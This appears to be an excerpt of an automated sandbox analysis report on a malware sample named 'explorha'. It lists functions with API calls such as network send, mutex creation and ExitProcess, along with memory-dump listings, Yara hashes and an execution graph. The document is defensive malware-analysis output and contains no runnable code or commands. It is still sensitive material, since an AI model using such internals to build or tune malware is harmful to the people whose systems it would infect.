                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1418687624-0
                                                                                                      • Opcode ID: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction ID: e9e38e6c009c3ee0ad944ab065100041e068efc5a6999c8281cb90c9d39b2413
                                                                                                      • Opcode Fuzzy Hash: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction Fuzzy Hash: 81A1F270900B069FDB21DB68C944B6ABBF8FF15310F018579E819DB281EB34EA04CBD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086D2DC Relevance: 6.2, APIs: 4, Instructions: 168networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • send.WS2_32(?,?,00000004,00000000), ref: 0086D43E
                                                                                                      • send.WS2_32(?,?,00000008,00000000), ref: 0086D47A
                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 0086D4BC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: send
                                                                                                      • String ID:
                                                                                                      • API String ID: 2809346765-0
                                                                                                      • Opcode ID: f3ca2d4bb112be24005be533feb38b59720ca78dea12c727d9b689e6ab62fcd1
                                                                                                      • Instruction ID: 40b276115e062521aa533d0c0ad9d3ded942d7fc71f643c03820cde1ecf44393
                                                                                                      • Opcode Fuzzy Hash: f3ca2d4bb112be24005be533feb38b59720ca78dea12c727d9b689e6ab62fcd1
                                                                                                      • Instruction Fuzzy Hash: 8441D672F002149BDB288B7CCC85BADB7B5FF45324F1142A9E829E73D1DA30AD408B85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086DAEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • invalid stoi argument, xrefs: 0086DD04
                                                                                                      • stoi argument out of range, xrefs: 0086DCFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID: invalid stoi argument$stoi argument out of range
                                                                                                      • API String ID: 1418687624-1606216832
                                                                                                      • Opcode ID: f9e43f14b3413fe1eb8de92eeeaa86eb6ab1c8bbe49878d425322a2b2dde8eaa
                                                                                                      • Instruction ID: 5bd817ea33aee4e4be95fefffcb158ed60f5d5fa310a50a8ee353e76da66c271
                                                                                                      • Opcode Fuzzy Hash: f9e43f14b3413fe1eb8de92eeeaa86eb6ab1c8bbe49878d425322a2b2dde8eaa
                                                                                                      • Instruction Fuzzy Hash: 2A119E32F00305CBDB24DBA8C841AA9B3B0FF44320F178469E849E7215EB31EC00CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.9%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:207
                                                                                                      Total number of Limit Nodes:9
                                                                                                      execution_graph 10574 897cb9 10577 897b57 10574->10577 10578 897b65 __cftof 10577->10578 10579 897bb0 10578->10579 10582 897bbb 10578->10582 10581 897bba 10588 89b922 GetPEB 10582->10588 10584 897bc5 10585 897bda __cftof 10584->10585 10586 897bca GetPEB 10584->10586 10587 897bf2 ExitProcess 10585->10587 10586->10585 10589 89b93c __cftof 10588->10589 10589->10584 10813 89ee4f 10816 89ee5c __dosmaperr 10813->10816 10814 89ee87 RtlAllocateHeap 10815 89ee9a __dosmaperr 10814->10815 10814->10816 10816->10814 10816->10815 10590 86a326 10591 86a340 10590->10591 10592 86a362 shared_ptr 10590->10592 10591->10592 10593 86a41e 10591->10593 10602 879750 10592->10602 10599 8982fa 10593->10599 10596 86a423 Sleep CreateMutexA 10598 86a45e 10596->10598 10597 86a3d3 10617 898286 10599->10617 10601 898309 ___std_exception_copy 10605 87976e 10602->10605 10607 879794 10602->10607 10603 87987e 10776 87a900 10603->10776 10605->10597 10606 879883 10779 862380 10606->10779 10607->10603 10608 87980d 10607->10608 10609 8797e8 10607->10609 10613 87ea77 RtlAllocateHeap 10608->10613 10614 8797f9 __cftof 10608->10614 10609->10606 10771 87ea77 10609->10771 10613->10614 10615 8982fa RtlAllocateHeap 10614->10615 10616 879860 shared_ptr 10614->10616 10615->10603 10616->10597 10623 89bde8 10617->10623 10619 89829f 10619->10601 10620 898291 ___std_exception_copy 10620->10619 10621 898286 ___std_exception_copy RtlAllocateHeap 10620->10621 10622 8982f6 10621->10622 10622->10601 10624 89bdf2 __dosmaperr 10623->10624 10626 89be0b 10624->10626 10634 89ee4f 10624->10634 10626->10620 10627 89be33 __dosmaperr 10628 89be73 10627->10628 10629 89be3b __dosmaperr 10627->10629 10642 89babf 10628->10642 10638 89c415 10629->10638 10633 89c415 ___free_lconv_mon RtlAllocateHeap 10633->10626 10637 89ee5c __dosmaperr 10634->10637 10635 89ee87 RtlAllocateHeap 10636 89ee9a __dosmaperr 10635->10636 10635->10637 10636->10627 10637->10635 10637->10636 10639 89c420 10638->10639 10641 89c43b __dosmaperr 10638->10641 10639->10641 10646 898ba3 10639->10646 10641->10626 10643 89bb2d __dosmaperr 10642->10643 10649 89ba65 10643->10649 10645 89bb56 10645->10633 10647 89bde8 __dosmaperr RtlAllocateHeap 10646->10647 10648 898ba8 10647->10648 10648->10641 10650 89ba71 __dosmaperr 10649->10650 10653 89bc46 10650->10653 10652 89ba93 __dosmaperr 10652->10645 10654 89bc7c __dosmaperr 10653->10654 10655 89bc55 __dosmaperr 10653->10655 10654->10652 10655->10654 10657 8a097f 10655->10657 10659 8a09ff 10657->10659 10660 8a0995 10657->10660 10661 89c415 ___free_lconv_mon RtlAllocateHeap 10659->10661 10684 8a0a4d 10659->10684 10660->10659 10665 89c415 ___free_lconv_mon RtlAllocateHeap 10660->10665 10667 8a09c8 10660->10667 10662 8a0a21 10661->10662 10663 89c415 ___free_lconv_mon RtlAllocateHeap 10662->10663 10668 8a0a34 10663->10668 10664 89c415 ___free_lconv_mon RtlAllocateHeap 10669 8a09f4 10664->10669 10671 8a09bd 10665->10671 10666 8a0a5b 10670 8a0abb 10666->10670 10677 89c415 RtlAllocateHeap ___free_lconv_mon 10666->10677 10672 89c415 ___free_lconv_mon RtlAllocateHeap 10667->10672 10683 8a09ea 10667->10683 10673 89c415 ___free_lconv_mon RtlAllocateHeap 10668->10673 10674 89c415 ___free_lconv_mon RtlAllocateHeap 10669->10674 10675 89c415 ___free_lconv_mon RtlAllocateHeap 10670->10675 10685 8a055c 10671->10685 10678 8a09df 10672->10678 10679 8a0a42 10673->10679 10674->10659 10680 8a0ac1 10675->10680 10677->10666 10713 8a065a 10678->10713 10682 89c415 ___free_lconv_mon RtlAllocateHeap 10679->10682 10680->10654 10682->10684 10683->10664 10725 8a0af0 10684->10725 10686 8a056d 10685->10686 10712 8a0656 10685->10712 10687 8a057e 10686->10687 10688 89c415 ___free_lconv_mon RtlAllocateHeap 10686->10688 10689 89c415 ___free_lconv_mon RtlAllocateHeap 10687->10689 10691 8a0590 10687->10691 10688->10687 10689->10691 10690 89c415 ___free_lconv_mon RtlAllocateHeap 10692 8a05a2 10690->10692 10691->10690 10691->10692 10693 89c415 ___free_lconv_mon RtlAllocateHeap 10692->10693 10694 8a05b4 10692->10694 10693->10694 10695 8a05c6 10694->10695 10696 89c415 ___free_lconv_mon RtlAllocateHeap 10694->10696 10697 8a05d8 10695->10697 10699 89c415 ___free_lconv_mon RtlAllocateHeap 10695->10699 10696->10695 10698 8a05ea 10697->10698 10700 89c415 ___free_lconv_mon RtlAllocateHeap 10697->10700 10701 8a05fc 10698->10701 10702 89c415 ___free_lconv_mon RtlAllocateHeap 10698->10702 10699->10697 10700->10698 10703 8a060e 10701->10703 10704 89c415 ___free_lconv_mon RtlAllocateHeap 10701->10704 10702->10701 10705 8a0620 10703->10705 10707 89c415 ___free_lconv_mon RtlAllocateHeap 10703->10707 10704->10703 10706 8a0632 10705->10706 10708 89c415 ___free_lconv_mon RtlAllocateHeap 10705->10708 10709 8a0644 10706->10709 10710 89c415 ___free_lconv_mon RtlAllocateHeap 10706->10710 10707->10705 10708->10706 10711 89c415 ___free_lconv_mon RtlAllocateHeap 10709->10711 10709->10712 10710->10709 10711->10712 10712->10667 10714 8a06bf 10713->10714 10715 8a0667 10713->10715 10714->10683 10716 8a0677 10715->10716 10717 89c415 ___free_lconv_mon RtlAllocateHeap 10715->10717 10718 8a0689 10716->10718 10720 89c415 ___free_lconv_mon RtlAllocateHeap 10716->10720 10717->10716 10719 8a069b 10718->10719 10721 89c415 ___free_lconv_mon RtlAllocateHeap 10718->10721 10722 8a06ad 10719->10722 10723 89c415 ___free_lconv_mon RtlAllocateHeap 10719->10723 10720->10718 10721->10719 10722->10714 10724 89c415 ___free_lconv_mon RtlAllocateHeap 10722->10724 10723->10722 10724->10714 10726 8a0b1c 10725->10726 10727 8a0afd 10725->10727 10726->10666 10727->10726 10731 8a06fb 10727->10731 10730 89c415 ___free_lconv_mon RtlAllocateHeap 10730->10726 10732 8a07d9 10731->10732 10733 8a070c 10731->10733 10732->10730 10767 8a06c3 10733->10767 10736 8a06c3 __dosmaperr RtlAllocateHeap 10737 8a071f 10736->10737 10738 8a06c3 __dosmaperr RtlAllocateHeap 10737->10738 10739 8a072a 10738->10739 10740 8a06c3 __dosmaperr RtlAllocateHeap 10739->10740 10741 8a0735 10740->10741 10742 8a06c3 __dosmaperr RtlAllocateHeap 10741->10742 10743 8a0743 10742->10743 10744 89c415 ___free_lconv_mon RtlAllocateHeap 10743->10744 10745 8a074e 10744->10745 10746 89c415 ___free_lconv_mon RtlAllocateHeap 10745->10746 10747 8a0759 10746->10747 10748 89c415 ___free_lconv_mon RtlAllocateHeap 10747->10748 10749 8a0764 10748->10749 10750 8a06c3 __dosmaperr RtlAllocateHeap 10749->10750 10751 8a0772 10750->10751 10752 8a06c3 __dosmaperr RtlAllocateHeap 10751->10752 10753 8a0780 10752->10753 10754 8a06c3 __dosmaperr RtlAllocateHeap 10753->10754 10755 8a0791 10754->10755 10756 8a06c3 __dosmaperr RtlAllocateHeap 10755->10756 10757 8a079f 10756->10757 10758 8a06c3 __dosmaperr RtlAllocateHeap 10757->10758 10759 8a07ad 10758->10759 10760 89c415 ___free_lconv_mon RtlAllocateHeap 10759->10760 10761 8a07b8 10760->10761 10762 89c415 ___free_lconv_mon RtlAllocateHeap 10761->10762 10763 8a07c3 10762->10763 10764 89c415 ___free_lconv_mon RtlAllocateHeap 10763->10764 10765 8a07ce 10764->10765 10766 89c415 ___free_lconv_mon RtlAllocateHeap 10765->10766 10766->10732 10768 8a06f6 10767->10768 10769 8a06e6 10767->10769 10768->10736 10769->10768 10770 89c415 ___free_lconv_mon RtlAllocateHeap 10769->10770 10770->10769 10772 862380 __dosmaperr ___std_exception_copy std::_Throw_future_error 10771->10772 10775 87ea96 std::_Throw_future_error 10772->10775 10783 894f3c 10772->10783 10775->10614 10804 87d849 10776->10804 10780 86238e std::_Throw_future_error 10779->10780 10781 894f3c ___std_exception_copy RtlAllocateHeap 10780->10781 10782 8623c3 10781->10782 10784 894f49 ___std_exception_copy 10783->10784 10788 8623c3 10783->10788 10787 894f76 10784->10787 10784->10788 10789 89b811 10784->10789 10798 89a1c6 10787->10798 10788->10614 10790 89b82c 10789->10790 10791 89b81e 10789->10791 10792 898ba3 __dosmaperr RtlAllocateHeap 10790->10792 10791->10790 10793 89b843 10791->10793 10797 89b834 10792->10797 10795 89b83e 10793->10795 10796 898ba3 __dosmaperr RtlAllocateHeap 10793->10796 10795->10787 10796->10797 10801 8982ea 10797->10801 10799 89c415 ___free_lconv_mon RtlAllocateHeap 10798->10799 10800 89a1de 10799->10800 10800->10788 10802 898286 ___std_exception_copy RtlAllocateHeap 10801->10802 10803 8982f6 10802->10803 10803->10795 10807 87d7b3 10804->10807 10806 87d85a std::_Throw_future_error 10810 8621e0 10807->10810 10809 87d7c5 10809->10806 10811 894f3c ___std_exception_copy RtlAllocateHeap 10810->10811 10812 862217 __floor_pentium4 10811->10812 10812->10809

                                                                                                      Executed Functions

                                                                                                      Function 00897BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 330 897bbb-897bc8 call 89b922 333 897bea-897bfc call 897bfd ExitProcess 330->333 334 897bca-897bd8 GetPEB 330->334 334->333 336 897bda-897be9 334->336 336->333
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00897BBA,?,?,?,?,?,00898C0E), ref: 00897BF6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
